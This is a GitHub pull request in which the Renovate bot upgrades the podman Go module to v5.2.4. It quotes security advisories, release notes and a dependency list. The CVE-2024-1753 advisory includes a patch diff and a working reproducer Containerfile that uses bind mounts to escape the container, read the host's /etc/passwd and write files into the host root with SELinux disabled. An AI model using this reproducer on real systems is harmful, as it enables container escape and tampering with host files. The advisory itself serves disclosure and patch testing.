Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update module github.com/containers/podman/v4 to v5 [security] #77

Open
wants to merge 1 commit into
base: main
Choose a base branch
from

Conversation

renovate[bot]
Copy link

@renovate renovate bot commented Aug 8, 2024

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
github.com/containers/podman/v4 v4.9.3 -> v5.2.4 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-1753

Impact

What kind of vulnerability is it? Who is impacted?

Users running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled. With selinux enabled, some read access is allowed.

Patches

From @​nalind . This is a patch for Buildah (https://github.com/containers/buildah). Once fixed there, Buildah will be vendored into Podman.


# cat /root/cve-2024-1753.diff
--- internal/volumes/volumes.go
+++ internal/volumes/volumes.go
@​@​ -11,6 +11,7 @​@​ import (
 
 	"errors"
 
+	"github.com/containers/buildah/copier"
 	"github.com/containers/buildah/define"
 	"github.com/containers/buildah/internal"
 	internalParse "github.com/containers/buildah/internal/parse"
@​@​ -189,7 +190,11 @​@​ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st
 	// buildkit parity: support absolute path for sources from current build context
 	if contextDir != "" {
 		// path should be /contextDir/specified path
-		newMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source))
+		evaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{})
+		if err != nil {
+			return newMount, "", err
+		}
+		newMount.Source = evaluated
 	} else {
 		// looks like its coming from `build run --mount=type=bind` allow using absolute path
 		// error out if no source is set

Reproducer

Prior to testing, as root, add a memorable username to /etc/passwd via adduser or your favorite editor. Also create a memorably named file in /. Suggest: touch /SHOULDNTSEETHIS.txt and adduser SHOULDNTSEETHIS. After testing, remember to remove both the file and the user from your system.

Use the following Containerfile


# cat ~/cve_Containerfile
FROM alpine as base

RUN ln -s / /rootdir
RUN ln -s /etc /etc2

FROM alpine

RUN echo "ls container root"
RUN ls -l /

RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host"
RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit

RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host"
RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 

To Test

Testing with an older version of Podman with the issue
setenforce 0
podman build -f ~/cve_Containerfile .

As part of the printout from the build, you should be able to see the contents of the /' and /etcdirectories, including the/SHOULDNOTSEETHIS.txtfile that you created, and the contents of the/etc/passwdfile which will include theSHOULDNOTSEETHISuser that you created. In addition, the file/BIND_BREAKOUTand/etc/BIND_BREAKOUT2` will exist on the host after the command is completed. Be sure to remove those two files between tests.

podman rm -a
podman rmi -a
rm /BIND_BREAKOUT
rm /etc/BIND_BREAKOUT2
setenforce 1
podman build -f ~/cve_Containerfile .

Neither the /BIND_BREAKEOUT or /etc/BIND_BREAKOUT2 files should be created. An error should be raised during the build when both files are trying to be created. Also, errors will be raised when the build tries to display the contents of the /etc/passwd file, and nothing will be displayed from that file.

However, the files in both the / and /etc directories on the host system will be displayed.

Testing with the patch

Use the same commands as testing with an older version of Podman.

When running using the patched version of Podman, regardless of the setenforce settings, you should not see the file that you created or the user that you added. Also the /BIND_BREAKOUT and the /etc/BIND_BREAKOUT will not exist on the host after the test completes.

NOTE: With the fix, the contents of the / and /etc directories, and the /etc/passwd file will be displayed, however, it will be the file and contents from the container image, and NOT the host system. Also the /BIND_BREAKOUT and /etc/BIND_BREAKOUT files will be created in the container image.

Workarounds

Ensure selinux controls are in place to avoid compromising sensitive system files and systems. With "setenforce 0" set, which is not at all advised, the root file system is open for modification with this exploit. With "setenfoce 1" set, which is the recommendation, files can not be changed. However, the contents of the / directory can be displayed. I.e., ls -alF / will show the contents of the host directory.

References

Unknown.

CVE-2024-9407

A vulnerability exists in the bind-propagation option of the Dockerfile RUN --mount instruction. The system does not properly validate the input passed to this option, allowing users to pass arbitrary parameters to the mount instruction. This issue can be exploited to mount sensitive directories from the host into a container during the build process and, in some cases, modify the contents of those mounted files. Even if SELinux is used, this vulnerability can bypass its protection by allowing the source directory to be relabeled to give the container access to host files.


Release Notes

containers/podman (github.com/containers/podman/v4)

v5.2.4

Compare Source

Security
  • This release addresses CVE-2024-9407, which allows arbitrary access to the host filesystem from RUN --mount arguments to a Dockerfile being built.
  • This release also addresses CVE-2024-9341, allowing the mounting of arbitrary directories from the host into containers on FIPS enabled systems using a malicious image with crafted symlinks.
Misc
  • Updated Buildah to v1.37.4
  • Updated the containers/common library to v0.60.4

v5.2.3

Compare Source

Bugfixes
  • Fixed a bug that could cause network namespaces to fail to unmount, resulting in Podman commands hanging.
  • Fixed a bug where Podman could not run images which included SCTP exposed ports.
  • Fixed a bug where containers run by the root user, but inside a user namespace (including inside a container), could not use the pasta network mode.
  • Fixed a bug where volume copy-up did not properly chown empty volumes when the :idmap mount option was used.
Misc
  • Updated Buildah to v1.37.3

v5.2.2

Compare Source

Bugfixes
  • Fixed a bug where rootless Podman could fail to validate the runtime's volume path on systems with a symlinked /home (#​23515).
Misc
  • Updated Buildah to v1.37.2
  • Updated the containers/common library to v0.60.2
  • Updated the containers/image library to v5.32.2

v5.2.1

Compare Source

Bugfixes
  • Fixed a bug where Podman could sometimes save an incorrect container state to the database, which could cause a number of issues including but not limited to attempting to clean up containers twice (#​21569).
Misc
  • Updated Buildah to v1.37.1
  • Updated the containers/common library to v0.60.1
  • Updated the containers/image library to v5.32.1

v5.2.0

Compare Source

Features
  • Podman now supports libkrun as a backend for creating virtual machines on MacOS. The libkrun backend has the advantage of allowing GPUs to be mounted into the virtual machine to accelerate tasks. The default backend remains applehv.
  • Quadlet now has support for .build files, which allows images to be built by Quadlet and then used by Quadlet containers.
  • Quadlet .container files now support two new fields, LogOpt to specify container logging configuration and StopSignal to specify container stop signal (#​23050).
  • Quadlet .container and .pod files now support a new field, NetworkAlias, to add network aliases.
  • Quadlet drop-in search paths have been expanded to include top-level type drop-ins (container.d, pod.d) and truncated unit drop-ins (unit-.container.d) (#​23158).
  • Podman now supports a new command, podman system check, which will identify (and, if possible, correct) corruption within local container storage.
  • The podman machine reset command will now reset all providers available on the current operating system (e.g. ensuring that both HyperV and WSL podman machine VMs will be removed on Windows).
Changes
  • Podman now requires the new kernel mount API, introducing a dependency on Linux Kernel v5.2 or higher.
  • Quadlet .image units now have a dependency on network-online.target (#​21873).
  • The --device option to podman create and podman run is no longer ignored when --privileged is also specified (#​23132).
  • The podman start and podman stop commands no longer print the full ID of the pod started/stopped, but instead the user's input used to specify the pod (e.g. podman pod start b will print b instead of the pod's full ID) (#​22590).
  • Virtual machines created by podman machine on Linux now use virtiofs instead of 9p for mounting host filesystems. Existing mounts will be transparently changed on machine restart or recreation. This should improve performance and reliability of host mounts. This requires the installation of virtiofsd on the host system to function.
  • Using both the --squash and --layers=false options to podman build at the same time is now allowed.
  • Podman now passes container's stop timeout to systemd when creating cgroups, causing it to be honored when systemd stops the scope. This should prevent hangs on system shutdown due to running Podman containers.
  • The --volume-driver option to podman machine init is now deprecated.
Bugfixes
  • Fixed a bug where rootless containers created with the --sdnotify=healthy option could panic when started (#​22651).
  • Fixed a bug where containers created with the --sdnotify=healthy option that exited quickly would sometimes return an error instead of notifying that the container was ready (#​22760).
  • Fixed a bug where the podman system reset command did not remove the containers/image blob cache (#​22825).
  • Fixed a bug where Podman would sometimes create a cgroup for itself even when the --cgroups=disabled option was specified at container creation time (#​20910).
  • Fixed a bug where the /etc/hosts file in a container was not created with a newline at the end of the file (#​22729).
  • Fixed a bug where the podman start command could sometimes panic when starting a container in the stopped state.
  • Fixed a bug where the podman system renumber command would fail if volumes existed when using the sqlite database backend (#​23052).
  • Fixed a bug where the podman container restore command could not successfully restore a container in a pod.
  • Fixed a bug where an error message from podman diff would suggest using the --latest option when using the remote Podman client (#​23038).
  • Fixed a bug where user could assign more memory to a Podman machine than existed on the host (#​18206).
  • Fixed a bug where the podman events command was rarely unable to report errors that occurred (#​23165).
  • Fixed a bug where containers run in systemd units would sometimes not be removed correctly on exit when using the --cidfile option.
  • Fixed a bug where the first Podman command run after a reboot could cause hang when using transient mode (#​22984).
  • Fixed a bug where Podman could throw errors about a database configuration mismatch if certain paths did not exist on the host.
  • Fixed a bug where the podman run and podman start commands could throw strange errors if another Podman process stopped the container at a midpoint in the process of starting (#​23246).
  • Fixed a bug where the podman system service command could leak a mount on termination.
  • Fixed a bug where the Podman remote client would panic if an invalid image filter was passed to podman images (#​23120).
  • Fixed a bug where the podman auto-update and podman system df commands could fail when a container was removed while the command was running (#​23279).
  • Fixed a bug where the podman machine init command could panic when trying to decompress an empty file when preparing the VM image (#​23281).
  • Fixed a bug where the podman ps --pod and podman pod stats commands could sometimes fail when a pod was removed while the command was running (#​23282).
  • Fixed a bug where the podman stats and podman pod stats commands would sometimes exit with a container is stopped error when showing all containers (or pod containers, for pod stats) if a container stopped while the command was running (#​23334).
  • Fixed a bug where the output of container healthchecks was not properly logged if it did not include a final newline (#​23332).
  • Fixed a bug where the port forwarding firewall rules of an existing container could be be overwritten when starting a second container which forwarded the same port on the host even if the second container failed to start as the port was already bound.
  • Fixed a bug where the containers created by the podman play kube command could sometimes not properly clean up their network stacks (#​21569).
API
  • The Build API for Images now accepts a comma-separated list in the Platform query parameter, allowing a single API call to built an image for multiple architectures (#​22071).
  • Fixed a bug where the Remove endpoint for Volumes would return an incorrectly formatted error when called with an ambiguous volume name (#​22616).
  • Fixed a bug where the Stats endpoint for Containers would return an incorrectly formatted error when called on a container that did not exist (#​22612).
  • Fixed a bug where the Start endpoint for Pods would return a 409 error code in cases where a 500 error code should have been returned (#​22989).
  • Fixed a bug where the Top endpoint for Pods would return a 200 status code and then subsequently an error (#​22986).
Misc
  • Podman no longer requires all parent directories of its root and runroot to be world-executable (#​23028).
  • Error messages from the podman build command when the -f option is given, but points to a file that does not exist, have been improved (#​22940).
  • The Podman windows installer is now built using WiX 5.
  • Updated the gvisor-tap-vsock library to v0.7.4. This release contains a fix for a gvproxy crash on macOS when there is heavy network traffic on a fast link.
  • Updated Buildah to v1.37.0
  • Updated the containers/image library to v5.32.0
  • Updated the containers/storage library to v1.55.0
  • Updated the containers/common library to v0.60.0

v5.1.2

Compare Source

Bugfixes
  • Fixed a bug that would sometimes prevent the mount of some podman machine volumes into the virtual machine when using the Apple hypervisor (#​22569).
  • Fixed a bug where podman top would show the incorrect UID for processes in containers run in a user namespace (#​22293).
  • Fixed a bug where the /etc/hosts and /etc/resolv.conf files in a container would be empty after restoring from a checkpoint (#​22901).
  • Fixed a bug where the --pod-id-file argument to podman run and podman create did not respect the pod's user namespace (#​22931).
  • Fixed a bug in the Podman remote client where specifying a invalid connection in the CONTAINER_CONNECTION environment variable would lead to a panic.
Misc
  • Virtual machines run by podman machine using the Apple hypervisor now wait 90 seconds before forcibly stopping the VM, matching the standard systemd shutdown timeout (#​22515).
  • Updates the containers/image library to v5.31.1

v5.1.1

Compare Source

Bugfixes
  • Fixed a bug where systemd timers associated with startup healthchecks would not be properly deleted after transitioning to the regular healthcheck (#​22884).
Misc
  • Updated the containers/common library to v0.59.1

v5.1.0

Compare Source

Features
  • VMs created by podman machine on macOS with Apple silicon can now use Rosetta 2 (a.k.a Rosetta) for high-speed emulation of x86 code. This is enabled by default. If you wish to change this option, you can do so in containers.conf.
  • Changes made by the podman update command are now persistent, and will survive container restart and be reflected in podman inspect.
  • The podman update command now includes a new option, --restart, to update the restart policy of existing containers.
  • Quadlet .container files now support a new key, GroupAdd, to add groups to the container.
  • Container annotations are now printed by podman inspect.
  • Image-based mounts using podman run --mount type=image,... now support a new option, subpath, to mount only part of the image into the container.
  • A new field, healthcheck_events, has been added to containers.conf under the [engine] section to allow users to disable the generation of health_status events to avoid spamming logs on systems with many healthchecks.
  • A list of images to automatically mount as volumes can now be specified in Kubernetes YAML via the io.podman.annotations.kube.image.automount/$CTRNAME annotation (where $CTRNAME is the name of the container they will be mounted into).
  • The podman info command now includes the default rootless network command (pasta or slirp4netns).
  • The podman ps command now shows ports from --expose that have not been published with --publish-all to improve Docker compatibility.
  • The podman runlabel command now expands $HOME in the label being run to the user's home directory.
  • A new alias, podman network list, has been added to the podman network ls command.
  • The name and shell of containers created by podmansh can now be set in containers.conf.
  • The podman-setup.exe Windows installer now provides 3 new CLI variables, MachineProvider (choose the provider for the machine, windows or wsl, the default), HyperVCheckbox (can be set to 1 to install HyperV if it is not already installed or 0, the default, to not install HyperV), and SkipConfigFileCreation (can be set to 1 to disable the creation of configuration files, or 0, the default).
Changes
  • Podman now changes volume ownership every time an empty named volume is mounted into a container, not just the first time, matching Docker's behavior.
  • When running Kubernetes YAML with podman kube play that does not include an imagePullPolicy and does not set a tag for the image, the image is now always pulled (#​21211).
  • When running Kubernetes YAML with podman kube play, pod-level restart policies are now passed down to individual containers within the pod (#​20903).
  • The --runroot global option can now accept paths with lengths longer than 50 characters (#​22272).
  • Updating containers with the podman update command now emits an event.
Bugfixes
  • Fixed a bug where the --userns=keep-id:uid=0 option to podman create and podman run would generate incorrect UID mappings and cause the container to fail to start (#​22078).
  • Fixed a bug where podman stats could report inaccurate percentages for very large or very small values (#​22064).
  • Fixed a bug where bind-mount volumes defaulted to rbind instead of bind, meaning recursive mounts were allowed by default (#​22107).
  • Fixed a bug where the podman machine rm -f command would fail to remove Hyper-V virtual machines if they were running.
  • Fixed a bug where the podman ps --sync command could sometimes fail to properly update the status of containers.
  • Fixed a bug where bind-mount volumes using the :idmap option would sometimes be inaccessible with rootless Podman (#​22228).
  • Fixed a bug where bind-mount volumes using the :U option would have their ownership changed to the owner of the directory in the image being mounted over (#​22224).
  • Fixed a bug where removing multiple containers, pods, or images with the --force option did not work when multiple arguments were given to the command and one of them did not exist (#​21529).
  • Fixed a bug where Podman did not properly clean up old cached Machine images.
  • Fixed a bug where rapidly-restarting containers with healthchecks could sometimes fail to start their healthchecks after restarting.
  • Fixed a bug where nested Podman could create its pause.pid file in an incorrect directory (#​22327).
  • Fixed a bug where Podman would panic if an OCI runtime was configured without associated paths in containers.conf (#​22561).
  • Fixed a bug where the podman kube down command would not respect the StopTimeout and StopSignal of containers that it stopped (#​22397).
  • Fixed a bug where Systemd-managed containers could be stuck in the Stopping state, unable to be restarted, if systemd killed the unit before podman stop finished stopping the container (#​19629).
  • Fixed a bug where the remote Podman client's podman farm build command would not updating manifests on the registry that were already pushed (#​22647).
  • Fixed a bug where rootless Podman could fail to re-exec itself when run with a custom argv[0] that is not a valid command path, as might happen when used in podmansh (#​22672).
  • Fixed a bug where podman machine connection URIs could be incorrect after an SSH port conflict, rendering machines inaccessible.
  • Fixed a bug where the podman events command would not print an error if incorrect values were passed to its --since and --until options.
  • Fixed a bug where an incorrect host.containers.internal entry could be added when running rootless containers using the bridge network mode (#​22653).
API
  • A new Docker-compatible endpoint, Update, has been added for containers.
  • The Compat Create endpoint for Containers now supports setting container annotations.
  • The Libpod List endpoint for Images now includes additional information in its responses (image architecture, OS, and whether the image is a manifest list) (#​22184 and #​22185).
  • The Build endpoint for Images no longer saves the build context as a temporary file, substantially improving performance and reducing required filesystem space on the server.
  • The Inspect API for Containers now returns results compatible with Podman v4.x when a request with version v4.0.0 is made. This allows Podman 4.X remote clients work with a Podman 5.X server (#​22657).
  • Fixed a bug where the Build endpoint for Images would not clean up temporary files created by the build if an error occurred.
Misc
  • Podman now detects unhandled system reboots and advises the user on proper mitigations.
  • Improved debugging output for podman machine on Darwin systems when --log-level=debug is used.
  • The Makefile now allows injecting extra build tags via the EXTRA_BUILD_TAGS environment variable.
  • Updated Buildah to v1.36.0
  • Updated the containers/common library to v0.59.0
  • Updated the containers/image library to v5.31.0
  • Updated the containers/storage library to v1.54.0

v5.0.3

Compare Source

Security
  • This release addresses CVE-2024-3727, a vulnerability in the containers/image library which allows attackers to trigger authenticated registry access on behalf of the victim user.
Bugfixes
  • Fixed a bug where podman machine start would fail if the machine had a volume with a long target path (#​22226).
  • Fixed a bug where podman machine start mounted volumes with paths that included dashes in the wrong location (#​22505).
Misc
  • Updated Buildah to v1.35.4
  • Updated the containers/common library to v0.58.3
  • Updated the containers/image library to v5.30.1

v5.0.2

Compare Source

Bugfixes
  • Fixed a bug that could leak IPAM entries when a network was removed (#​22034).
  • Fixed a bug that could cause the rootless network namespace to not be cleaned up on if an error occurred during setup resulting in errors relating to a missing resolv.conf being displayed (#​22168).
  • Fixed a bug where Podman would use rootless network namespace logic for nested containers (#​22218).
  • Fixed a bug where writing to volumes on a Mac could result in EACCESS failures when using the :z or :Z volume mount options on a directory with read only files (#​19852)
API
  • Fixed a bug in the Compat List endpoint for Networks which could result in a server crash due to concurrent writes to a map (#​22330).

v5.0.1

Compare Source

Bugfixes
  • Fixed a bug where rootless containers using the Pasta network driver did not properly handle localhost DNS resolvers on the host leading to DNS resolution issues (#​22044).
  • Fixed a bug where Podman would warn that cgroups v1 systems were no longer supported on FreeBSD hosts.
  • Fixed a bug where HyperV podman machine VMs required an SSH client be installed on the system (#​22075).
  • Fixed a bug that prevented the remote Podman client's podman build command from working properly when connecting from a rootless client to a rootful server (#​22109).
Misc
  • The HyperV driver to podman machine now fails immediately if admin privileges are not available (previously, it would only fail when it reached operations that required admin privileges).

v5.0.0

Compare Source

5.0.0

Security
  • Fixed CVE-2024-1753 in Buildah and podman build which allowed a user to write files to the / directory of the host machine if selinux was not enabled.
Features
  • VMs created by podman machine can now use the native Apple hypervisor (applehv) when run on MacOS.
  • A new command has been added, podman machine reset, which will remove all existing podman machine VMs and relevant configurations.
  • The podman manifest add command now supports a new --artifact option to add OCI artifacts to a manifest list.
  • The podman create, podman run, and podman push commands now support the --retry and --retry-delay options to configure retries for pushing and pulling images.
  • The podman run and podman exec commands now support a new option, --preserve-fd, which allows passing a list of file descriptors into the container (as an alternative to --preserve-fds, which passes a specific number of file descriptors).
  • Quadlet now supports templated units (#​17744).
  • The podman kube play command can now create image-based volumes using the volume.podman.io/image annotation.
  • Containers created with podman kube play can now include volumes from other containers (similar to the --volumes-from option) using a new annotation, io.podman.annotations.volumes-from (#​16819).
  • Pods created with podman kube play can now set user namespace options through the the io.podman.annotations.userns annotation in the pod definition (#​20658).
  • Macvlan and ipvlan networks can adjust the name of the network interface created inside containers via the new containers.conf field interface_name (#​21313).
  • The --gpus option to podman create and podman run is now compatible with Nvidia GPUs (#​21156).
  • The --mount option to podman create and podman run supports a new mount option, no-dereference, to mount a symlink (instead of its dereferenced target) into a container (#​20098).
  • Podman now supports a new global option, --config, to point to a Docker configuration where we can source registry login credentials.
  • The podman ps --format command now supports a new format specifier, .Label (#​20957).
  • The uidmapping and gidmapping options to the podman run --userns=auto option can now map to host IDs by prefixing host IDs with the @ symbol.
  • Quadlet now supports systemd-style drop-in directories.
  • Quadlet now supports creating pods via new .pod unit files (#​17687).
  • Quadlet now supports two new keys, Entrypoint and StopTimeout, in .container files (#​20585 and #​21134).
  • Quadlet now supports specifying the Ulimit key multiple times in .container files to set more than one ulimit on a container.
  • Quadlet now supports setting the Notify key to healthy in .container files, to only sdnotify that a container has started when its health check begins passing (#​18189).
Breaking Changes
  • The backend for the podman machine commands has seen extensive rewrites. Configuration files have changed format and VMs from Podman 4.x and earlier are no longer usable. podman machine VMs must be recreated with Podman 5.
  • The podman machine init command now pulls images as OCI artifacts, instead of using HTTP. As a result, a valid policy.json file is required on the host. Windows and Mac installers have been changed to install this file.
  • QEMU is no longer a supported VM provider for podman machine on Mac. Instead, the native Apple hypervisor is supported.
  • The ConfigPath and Image fields are no longer provided by the podman machine inspect command. Users can also no longer use {{ .ConfigPath }} or {{ .Image }} as arguments to podman machine inspect --format.
  • The output of podman inspect for containers has seen a number of breaking changes to improve Docker compatibility, including changing Entrypoint from a string to an array of strings and StopSignal from an int to a string.
  • The podman inspect command for containers now returns nil for healthchecks when inspecting containers without healthchecks.
  • The podman pod inspect command now outputs a JSON array regardless of the number of pods inspected (previously, inspecting a single pod would omit the array).
  • It is no longer possible to create new BoltDB databases; attempting to do so will result in an error. All new Podman installations will now use the SQLite database backend. Existing BoltDB databases remain usable.
  • Support for CNI networking has been gated by a build tag and will not be enabled by default.
  • Podman will now print warnings when used on cgroups v1 systems. Support for cgroups v1 is deprecated and will be removed in a future release. The PODMAN_IGNORE_CGROUPSV1_WARNING environment variable can be set to suppress warnings.
  • Network statistics sent over the Docker API are now per-interface, and not aggregated, improving Docker compatibility.
  • The default tool for rootless networking has been swapped from slirp4netns to pasta for improved performance. As a result, networks named pasta are no longer supported.
  • The --image option replaces the now deprecated --image-path option for podman machine init.
  • The output of podman events --format "{{json .}}" has been changed to improve Docker compatibility, including the time and timeNano fields (#​14993).
  • The name of podman machine VMs and the username used within the VM are now validated and must match this regex: [a-zA-Z0-9][a-zA-Z0-9_.-]*.
  • Using multiple filters with the List Images REST API now combines the filters with AND instead of OR, improving Docker compatibility (#​18412).
  • The parsing for a number of Podman CLI options which accept arrays has been changed to no longer accept string-delineated lists, and instead to require the option to be passed multiple times. These options are --annotation to podman manifest annotate and podman manifest add, the --configmap, --log-opt, and --annotation options to podman kube play, the --pubkeysfile option to podman image trust set, the --encryption-key and --decryption-key options to podman create, podman run, podman push and podman pull, the --env-file option to podman exec, the --bkio-weight-device, --device-read-bps, --device-write-bps --device-read-iops, --device-write-iops, --device, --label-file, --chrootdirs, --log-opt, and --env-file options to podman create and podman run, and the --hooks-dir and --module global options.
Changes
  • The podman system reset command no longer waits for running containers to gracefully stop, and instead immediately sends SIGKILL (#​21874).
  • The podman network inspect command now includes running containers using the network in its output (#​14126).
  • The podman compose command is now supported on non-AMD64/ARM64 architectures.
  • VMs created by podman machine will now pass HTTP proxy environment variables into the VM for all providers.
  • The --no-trunc option to the podman kube play and podman kube generate commands has been deprecated. Podman now complies to the Kubernetes specification for annotation size, removing the need for this option.
  • The DOCKER_HOST environment variable will be set by default for rootless users when podman-docker is installed.
  • Connections from podman system connection and farms from podman farm are now written to a new configuration file called podman-connections.conf. As a result, Podman no longer writes to containers.conf. Existing connections from containers.conf will still be respected.
  • Most podman farm subcommands (save for podman farm build) no longer need to connect to the machines in the farm to run.
  • The podman create and podman run commands no longer require specifying an entrypoint on the command line when the container image does not define one. In this case, an empty command will be passed to the OCI runtime, and the resulting behavior is runtime-specific.
  • The default SELinux label for content mounted from the host in podman machine VMs on Mac is now system_u:object_r:nfs_t:s0 so that it can be shared with all containers without issue.
  • Newly-created VMs created by podman machine will now share a single SSH key key for access. As a result, podman machine rm --save-keys is deprecated as the key will persist by default.
Bugfixes
  • Fixed a bug where the podman stats command would not show network statistics when the pasta network mode was used.
  • Fixed a bug where podman machine VMs using the HyperV provider could not mount shares on directories that did not yet exist.
  • Fixed a bug where the podman compose command did not respect the --connection and --url options.
  • Fixed a bug where the podman stop -t -1 command would wait for 0 seconds, not infinite seconds, before sending SIGKILL (#​21811).
  • Fixed a bug where Podman could deadlock when cleaning up a container when the slirp4netns network mode was used with a restart policy of always or unless-stopped or on-failure and a user namespace (#​21477).
  • Fixed a bug where uninstalling Podman on Mac did not remove the docker.sock symlink (#​20650).
  • Fixed a bug where preexisting volumes being mounted into a new container using a path that exists in said container would not be properly chowned (#​21608).
  • Fixed a bug where the podman image scp command could fail if there was not sufficient space in the destination machine's /tmp for the image (#​21239).
  • Fixed a bug where containers killed by running out of memory (including due to a memory limit) were not properly marked as OOM killed in podman inspect (#​13102).
  • Fixed a bug where podman kube play did not create memory-backed emptyDir volumes using a tmpfs filesystem.
  • Fixed a bug where containers started with --rm were sometimes not removed after a reboot (#​21482).
  • Fixed a bug where the podman events command using the remote Podman client did not display the network name associated with network events (#​21311).
  • Fixed a bug where the podman farm build did not properly handle the --tls-verify option and would override server defaults even if the option was not set by the user (#​21352).
  • Fixed a bug where the podman inspect command could segfault on FreeBSD (#​21117).
  • Fixed a bug where Quadlet did not properly handle comment lines ending with a backslash (#​21555).
  • Fixed a bug where Quadlet would sometimes not report errors when malformed quadlet files were present.
  • Fixed a bug where Quadlet could hang when given a .container file with certain types of trailing whitespace (#​21109).
  • Fixed a bug where Quadlet could panic when generating from Kubernetes YAML containing the bind-mount-options key (#​21080).
  • Fixed a bug where Quadlet did not properly strip quoting from values in .container files (#​20992).
  • Fixed a bug where the --publish-all option to podman kube play did not function when used with the remote Podman client.
  • Fixed a bug where the podman kube play --build command could not build images whose Dockerfile specified an image from a private registry with a self-signed certificate in a FROM directive (#​20890).
  • Fixed a bug where container remove events did not have the correct exit code set (#​19124).
API
  • A new API endpoint, /libpod/images/$name/resolve, has been added to resolve a (potential) short name to a list of fully-qualified image references Podman which could be used to pull the image.
  • Fixed a bug where the List API for Images did not properly handle filters and would discard all but the last listed filter.
  • Fixed a bug in the Docker Create API for Containers where entries from /etc/hosts were copied into create containers, resulting in incompatibility with network aliases.
  • Fixed a bug in the Libpod and Docker Exec APIs for Containers which caused incorrect header values to be set when upgrading a connection for an interactive exec session.
  • The API bindings have been refactored to reduce code size, leading to smaller binaries (#​17167).
Misc
  • Failed image pulls will now generate an event including the error.
  • The gzip compression library used for sending build contexts, improving performance for remote podman build.
  • Updated Buildah to v1.35.1
  • Updated the containers/image library to v5.30.0
  • Updated the containers/storage library to v1.53.0
  • Updated the containers/common library to v0.58.0
  • Updated the libhvee library to v0.7.0

v4.9.5

Compare Source

Security
  • This release addresses CVE-2024-3727, a vulnerability in the containers/image library which allows attackers to trigger authenticated registry access on behalf of the victim user.
API
  • Fixed a bug in the Compat List endpoint for Networks which could result in a server crash due to concurrent writes to a map (#​22330).

v4.9.4

Compare Source

Security
  • Fixed CVE-2024-1753 in Buildah and podman build which allowed a user to write files to the / directory of the host machine if selinux was not enabled.
Bugfixes
  • Fixed a bug where health check status would be updated to "healthy" before the startup delay had expired.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/go-github.com-containers-podman-v4-vulnerability branch from 0d87d7b to b5a3b49 Compare October 10, 2024 02:32
@renovate renovate bot changed the title chore(deps): update module github.com/containers/podman/v4 to v4.9.4 [security] chore(deps): update module github.com/containers/podman/v4 to v5 [security] Oct 10, 2024
Copy link
Author

renovate bot commented Oct 10, 2024

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 63 additional dependencies were updated

Details:

Package Change
github.com/spf13/cobra v1.8.0 -> v1.8.1
golang.org/x/text v0.14.0 -> v0.17.0
github.com/BurntSushi/toml v1.3.2 -> v1.4.0
github.com/Microsoft/go-winio v0.6.1 -> v0.6.2
github.com/Microsoft/hcsshim v0.12.0-rc.3 -> v0.12.5
github.com/cilium/ebpf v0.9.1 -> v0.11.0
github.com/containerd/cgroups/v3 v3.0.2 -> v3.0.3
github.com/containerd/containerd v1.7.9 -> v1.7.18
github.com/containers/buildah v1.33.7 -> v1.37.4
github.com/containers/common v0.57.4 -> v0.60.4
github.com/containers/image/v5 v5.30.1 -> v5.32.2
github.com/containers/ocicrypt v1.1.9 -> v1.2.0
github.com/containers/psgo v1.8.0 -> v1.9.0
github.com/containers/storage v1.53.0 -> v1.55.0
github.com/cyphar/filepath-securejoin v0.2.4 -> v0.3.1
github.com/distribution/reference v0.5.0 -> v0.6.0
github.com/docker/docker v25.0.3+incompatible -> v27.1.1+incompatible
github.com/docker/docker-credential-helpers v0.8.1 -> v0.8.2
github.com/frankban/quicktest v1.14.4 -> v1.14.5
github.com/go-logr/logr v1.3.0 -> v1.4.2
github.com/go-openapi/analysis v0.21.4 -> v0.23.0
github.com/go-openapi/errors v0.21.1 -> v0.22.0
github.com/go-openapi/jsonpointer v0.19.6 -> v0.21.0
github.com/go-openapi/jsonreference v0.20.2 -> v0.21.0
github.com/go-openapi/loads v0.21.2 -> v0.22.0
github.com/go-openapi/runtime v0.26.0 -> v0.28.0
github.com/go-openapi/spec v0.20.9 -> v0.21.0
github.com/go-openapi/strfmt v0.22.2 -> v0.23.0
github.com/go-openapi/swag v0.22.10 -> v0.23.0
github.com/go-openapi/validate v0.22.1 -> v0.24.0
github.com/golang/protobuf v1.5.3 -> v1.5.4
github.com/google/go-containerregistry v0.19.0 -> v0.20.0
github.com/gorilla/schema v1.2.0 -> v1.4.1
github.com/klauspost/compress v1.17.7 -> v1.17.9
github.com/letsencrypt/boulder v0.0.0-20230907030200-6d76a0f91e1e -> v0.0.0-20240418210053-89b07f4543e0
github.com/mattn/go-runewidth v0.0.15 -> v0.0.16
github.com/moby/sys/mountinfo v0.7.1 -> v0.7.2
github.com/moby/sys/user v0.1.0 -> v0.3.0
github.com/opencontainers/runc v1.1.10 -> v1.1.13
github.com/rivo/uniseg v0.4.4 -> v0.4.7
github.com/sigstore/fulcio v1.4.3 -> v1.4.5
github.com/sigstore/rekor v1.2.2 -> v1.3.6
github.com/sigstore/sigstore v1.8.2 -> v1.8.4
github.com/stefanberger/go-pkcs11uri v0.0.0-20201008174630-78d3cae3a980 -> v0.0.0-20230803200340-78284954bff6
github.com/sylabs/sif/v2 v2.15.1 -> v2.18.0
